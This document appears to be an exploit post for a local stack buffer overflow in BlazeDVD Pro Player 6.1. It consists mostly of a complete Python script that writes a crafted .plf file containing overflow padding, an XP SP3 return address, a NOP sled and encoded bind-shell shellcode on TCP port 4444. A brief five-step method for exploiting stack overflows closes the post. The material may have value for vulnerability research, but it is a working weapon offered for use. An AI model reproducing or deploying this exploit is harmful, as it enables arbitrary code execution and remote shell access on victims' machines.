PoC: BlazeDVD Pro Player 6.1 — local stack-based buffer overflow triggered by a crafted .plf file
PuN1sh3r showed how to exploit BlazeDVD Pro Player 6.1 on Windows Server 2003 SP1 (EN).
Below is a PoC for Windows XP SP3. Note that the hard-coded return address in the script is presumably specific to that OS / service-pack / language build and will need to be re-found for any other target.
#!/usr/bin/env python2
# -*- coding: utf8 -*-
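# Exploit-specific constants. The offsets come from crashing the player and
# locating the saved-return-address overwrite (see the steps at the end of the
# post); they are valid only for this build of BlazeDVD Pro 6.1.
JUNK_LEN = 260                          # bytes before the saved return address
RET_ADDR = b"\x7B\x46\x86\x7C"          # 0x7C86467B, little-endian.
# NOTE(review): presumably a JMP/CALL ESP-style gadget, since the NOP sled is
# placed directly after the overwritten return address — confirm in a debugger.
# This address is OS/SP/language specific (the post targets Windows XP SP3).
# RET_ADDR = b"\xD8\x9E\x24\x77"        # 0x77249ed8, alternative kept from the original PoC
BAD_CHARS = frozenset([0x00, 0x0A, 0x1A])  # bytes the target mangles or truncates on
NOP_SLED_LEN = 32                       # NOPs between the return address and the shellcode
TOTAL_LEN = 2000                        # fixed file size the original PoC produced
OUTPUT_FILE = "exploit.plf"

# windows/shell_bind_tcp - 355 bytes - http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
# EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
# NOTE(review): this is an *unauthenticated* bind shell listening on TCP/4444 —
# anyone who can reach the host gets the shell. Only run this in an isolated lab.
SHELLCODE = (
    b"\xd9\xc6\xd9\x74\x24\xf4\x58\x2b\xc9\xb1\x53\xbf\xe9"
    b"\xe6\x11\xd6\x31\x78\x17\x83\xe8\xfc\x03\x91\xf5\xf3"
    b"\x23\x9d\x12\x71\xcb\x5d\xe3\x16\x45\xb8\xd2\x16\x31"
    b"\xc9\x45\xa7\x31\x9f\x69\x4c\x17\x0b\xf9\x20\xb0\x3c"
    b"\x4a\x8e\xe6\x73\x4b\xa3\xdb\x12\xcf\xbe\x0f\xf4\xee"
    b"\x70\x42\xf5\x37\x6c\xaf\xa7\xe0\xfa\x02\x57\x84\xb7"
    b"\x9e\xdc\xd6\x56\xa7\x01\xae\x59\x86\x94\xa4\x03\x08"
    b"\x17\x68\x38\x01\x0f\x6d\x05\xdb\xa4\x45\xf1\xda\x6c"
    b"\x94\xfa\x71\x51\x18\x09\x8b\x96\x9f\xf2\xfe\xee\xe3"
    b"\x8f\xf8\x35\x99\x4b\x8c\xad\x39\x1f\x36\x09\xbb\xcc"
    b"\xa1\xda\xb7\xb9\xa6\x84\xdb\x3c\x6a\xbf\xe0\xb5\x8d"
    b"\x6f\x61\x8d\xa9\xab\x29\x55\xd3\xea\x97\x38\xec\xec"
    b"\x77\xe4\x48\x67\x95\xf1\xe0\x2a\xf2\x36\xc9\xd4\x02"
    b"\x51\x5a\xa7\x30\xfe\xf0\x2f\x79\x77\xdf\xa8\x7e\xa2"
    b"\xa7\x26\x81\x4d\xd8\x6f\x46\x19\x88\x07\x6f\x22\x43"
    b"\xd7\x90\xf7\xfe\xdf\x37\xa8\x1c\x22\x87\x18\xa1\x8c"
    b"\x60\x73\x2e\xf3\x91\x7c\xe4\x9c\x3a\x81\x07\xb3\xe6"
    b"\x0c\xe1\xd9\x06\x59\xb9\x75\xe5\xbe\x72\xe2\x16\x95"
    b"\x2a\x84\x5f\xff\xed\xab\x5f\xd5\x59\x3b\xd4\x3a\x5e"
    b"\x5a\xeb\x16\xf6\x0b\x7c\xec\x97\x7e\x1c\xf1\xbd\xe8"
    b"\xbd\x60\x5a\xe8\xc8\x98\xf5\xbf\x9d\x6f\x0c\x55\x30"
    b"\xc9\xa6\x4b\xc9\x8f\x81\xcf\x16\x6c\x0f\xce\xdb\xc8"
    b"\x2b\xc0\x25\xd0\x77\xb4\xf9\x87\x21\x62\xbc\x71\x80"
    b"\xdc\x16\x2d\x4a\x88\xef\x1d\x4d\xce\xef\x4b\x3b\x2e"
    b"\x41\x22\x7a\x51\x6e\xa2\x8a\x2a\x92\x52\x74\xe1\x16"
    b"\x62\x3f\xab\x3f\xeb\xe6\x3e\x02\x76\x19\x95\x41\x8f"
    b"\x9a\x1f\x3a\x74\x82\x6a\x3f\x30\x04\x87\x4d\x29\xe1"
    b"\xa7\xe2\x4a\x20"
)


def find_bad_chars(data, bad_chars=BAD_CHARS):
    """Return the offsets in *data* (bytes) whose value is in *bad_chars*.

    ``bytearray`` is used so iteration yields ints on both Python 2 and 3.
    """
    return [i for i, value in enumerate(bytearray(data)) if value in bad_chars]


def build_payload(ret_addr=RET_ADDR, shellcode=SHELLCODE, total_len=TOTAL_LEN):
    """Assemble the .plf contents: junk | ret_addr | NOP sled | shellcode | NOP padding.

    The layout is byte-identical to the original PoC: 260 x 'A', the 4-byte
    return address, 32 NOPs, the 355-byte shellcode, then NOPs up to *total_len*.

    Raises ValueError if the assembled prefix does not fit in *total_len* or if
    any byte of the final payload is one of BAD_CHARS (the original script
    listed them but never checked, so a re-generated shellcode could silently
    break the exploit).
    """
    sled = b"\x90" * NOP_SLED_LEN
    prefix = b"A" * JUNK_LEN + ret_addr + sled + shellcode
    if len(prefix) > total_len:
        raise ValueError(
            "payload prefix is %d bytes, exceeds total_len=%d" % (len(prefix), total_len)
        )
    payload = prefix + b"\x90" * (total_len - len(prefix))

    bad = find_bad_chars(payload)
    if bad:
        raise ValueError("bad characters present at offsets %s" % bad)
    return payload


def write_exploit(path=OUTPUT_FILE):
    """Write the payload to *path* in binary mode and return the path.

    Binary mode matters: the original opened the file in text mode, which on
    Python 3 would UTF-8-encode every byte >= 0x80 (corrupting the shellcode
    and the return address) and on Windows would rewrite 0x0A as CRLF.
    """
    payload = build_payload()
    with open(path, "wb") as f:
        f.write(payload)
    return path


if __name__ == "__main__":
    write_exploit()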
How do you exploit a simple stack overflow?
1. crash the program
2. find the offset that overwrites EIP and a return address that redirects execution into your buffer
3. identify the bad characters the target mangles (here 0x00, 0x0A, 0x1A)
4. generate shellcode that avoids those bad characters
5. assemble and test the final exploit